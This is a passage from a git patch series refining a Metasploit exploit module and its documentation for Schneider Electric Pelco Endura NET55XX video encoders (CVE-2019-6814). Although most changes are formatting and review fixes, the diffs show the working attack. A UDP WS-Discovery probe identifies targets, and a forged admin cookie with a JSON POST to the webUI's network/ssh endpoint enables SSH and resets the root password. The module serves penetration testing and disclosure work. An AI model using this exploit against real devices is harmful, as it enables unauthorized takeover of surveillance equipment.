to go. **NEW_PASSWORD** From 68818aa4c722994afb8aeb5858248f09ef6fce09 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 10:30:05 -0300 Subject: [PATCH 19/30] Update schneider_electric_net55xx_encoder.rb --- .../schneider_electric_net55xx_encoder.rb | 36 +++++++++---------- 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 94533326ac..6069c279c6 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -61,28 +61,28 @@ class MetasploitModule < Msf::Exploit::Remote ] ) end - + def new_password datastore['NEW_PASSWORD'] end - + def check - xmlPayload = ''\ - ''\ - '
'\ - 'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ - 'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ - ''\ - 'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ - ''\ - 'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ - '
'\ - ''\ - ''\ - 'dp0:NetworkVideoTransmitter'\ - ''\ - ''\ - '' + xmlPayload = ''\ +''\ +'
'\ +'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ +'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ +''\ +'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ +''\ +'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ +'
'\ +''\ +''\ +'dp0:NetworkVideoTransmitter'\ +''\ +''\ +'' connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) udp_sock.put(xmlPayload) resp = [] From f1a6c0cc45b54b4b514a936cf8388f764519d8f6 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 14:08:09 -0300 Subject: [PATCH 20/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 6069c279c6..2b09a34e87 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 print_good("#{rhost}:80 - Successfully changed the root password...") - end + end def do_login change_password From e1e89882d639f2515e078a0656e53e9a46442bec Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 14:08:34 -0300 Subject: [PATCH 21/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 2b09a34e87..c1ae4c67c1 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote [ OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) - ], self.class + ] ) register_advanced_options( From c0377c97c5c0d2117163fdff2cbef57945fbcb60 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 23:31:10 -0300 Subject: [PATCH 22/30] Update schneider_electric_net55xx_encoder.rb --- .../unix/http/schneider_electric_net55xx_encoder.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index c1ae4c67c1..d16a0dfeb9 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -15,10 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", 'Description' => %q{ - This module exploits an inadequate access control vulnerability creating a malicious - json request to the webUI encoder, thus allowing the SSH service to be enabled , and - changing the root password. This module has been tested sucessfully on: NET5501, - NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. + This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. + This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. }, 'License' => MSF_LICENSE, 'Author' => From 836805b3cdc41dd31189e187ad9ef59621423256 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 23:37:18 -0300 Subject: [PATCH 23/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index d16a0dfeb9..951c6f661a 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508") return Exploit::CheckCode::Appears end - Exploit::CheckCode::Safe + CheckCode::Safe end def change_password From 3c577417942d834b9437ec7ffdc902e3d4e3a0dd Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 23:38:45 -0300 Subject: [PATCH 24/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 951c6f661a..d22bc235b5 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote end def change_password - print_status("#{rhost}:80 - Attempt to change the root password...") + print_status("#{peer} - Attempt to change the root password...") headers = {} headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' headers['Content-Type'] = 'application/json;charset=utf-8' From a70a74d480e8ed48a1ba16ef9502cd4a4ef0d215 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Fri, 19 Jul 2019 23:41:31 -0300 Subject: [PATCH 25/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index d22bc235b5..2662cad9e6 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", 'Description' => %q{ - This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. - This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. + This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. + This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. }, 'License' => MSF_LICENSE, 'Author' => From af7eba5828e593ef68c19b76f05cad87f165862f Mon Sep 17 00:00:00 2001 From: vitorespf Date: Sat, 20 Jul 2019 00:07:24 -0300 Subject: [PATCH 26/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 2662cad9e6..1e7a5bb18a 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account']), + OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]), OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10]) ] ) From bfa17a05b46bf37c51f78ed9ff283fd5808a1989 Mon Sep 17 00:00:00 2001 From: vitorespf Date: Sat, 20 Jul 2019 00:44:21 -0300 Subject: [PATCH 27/30] Update schneider_electric_net55xx_encoder.rb --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index 1e7a5bb18a..b0307607e1 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -14,9 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", - 'Description' => %q{ - This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. - This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. + 'Description' => %q{This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. }, 'License' => MSF_LICENSE, 'Author' => @@ -108,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 print_good("#{rhost}:80 - Successfully changed the root password...") + print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}") end def do_login From d498eaceaf8ff18450b04785be5492e961b0e2bd Mon Sep 17 00:00:00 2001 From: vitorespf Date: Sat, 20 Jul 2019 01:17:55 -0300 Subject: [PATCH 28/30] Update modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb Co-Authored-By: bcoles --- .../exploits/unix/http/schneider_electric_net55xx_encoder.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index b0307607e1..c7040e6c27 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote headers = {} headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' headers['Content-Type'] = 'application/json;charset=utf-8' - post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}" + post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), From 6a2ae1418a0d0ff45c896e42848b786cabc7318e Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 22 Jul 2019 12:24:55 -0500 Subject: [PATCH 29/30] format xml, change headers --- .../schneider_electric_net55xx_encoder.rb | 51 ++++++++++--------- 1 file changed, 28 insertions(+), 23 deletions(-) diff --git a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb index c7040e6c27..a3dc9b9248 100644 --- a/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb +++ b/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb @@ -14,14 +14,16 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, 'Name' => "Schneider Electric Pelco Endura NET55XX Encoder", - 'Description' => %q{This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. This module has been tested sucessfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550 versions. - }, + 'Description' => %q( + This module exploits inadequate access controls within the webUI to enable + the SSH service and change the root password. This module has been tested successfully + on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions. + ), 'License' => MSF_LICENSE, 'Author' => [ 'Lucas Dinucci ', 'Vitor Esperança ' - ], 'References' => [ @@ -63,22 +65,23 @@ class MetasploitModule < Msf::Exploit::Remote end def check - xmlPayload = ''\ -''\ -'
'\ -'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ -'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ -''\ -'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ -''\ -'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ -'
'\ -''\ -''\ -'dp0:NetworkVideoTransmitter'\ -''\ -''\ -'' + xmlPayload = ''\ + ''\ + '
'\ + 'http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe'\ + 'uuid:f3d577a3-431f-4450-ab45-b480042b9c74'\ + ''\ + 'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous'\ + ''\ + 'urn:schemas-xmlsoap-org:ws:2005:04:discovery'\ + '
'\ + ''\ + ''\ + 'dp0:NetworkVideoTransmitter'\ + ''\ + ''\ + '' + connect_udp(true, {'RPORT' => datastore['UDP_PORT']}) udp_sock.put(xmlPayload) resp = [] @@ -93,15 +96,17 @@ class MetasploitModule < Msf::Exploit::Remote def change_password print_status("#{peer} - Attempt to change the root password...") - headers = {} - headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647' - headers['Content-Type'] = 'application/json;charset=utf-8' post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json + login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'), 'data' => post, - 'headers' => headers, + 'headers' => + { + 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647', + 'Content-Type' => 'application/json;charset=utf-8' + } }, timeout=datastore['TIMEOUT']) fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200 From 0293e74190108daa3da996c5abb200acacffd47b Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 22 Jul 2019 12:28:47 -0500 Subject: [PATCH 30/30] remove extra lines --- .../exploit/unix/http/schneider_electric_net55xx_encoder.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index 53fb4bd7dc..c01021f1cb 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -3,12 +3,12 @@ Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814) Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550). - This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password. +This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password. ## Verification Steps - [ ] Start `msfconsole` -- [ ] `use use exploit/linux/http/schneider_electric_net55xx_encoder` +- [ ] `use exploit/linux/http/schneider_electric_net55xx_encoder` - [ ] `set RHOSTS [rhosts]` - [ ] `set RPORT [rport]` - [ ] `set NEW_PASSWORD [new password]` @@ -23,7 +23,6 @@ This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, a You should set a new SSH password to the vulnerable device. - ## Scenarios **Schneider Electric Pelco Encoder NET5501-XT**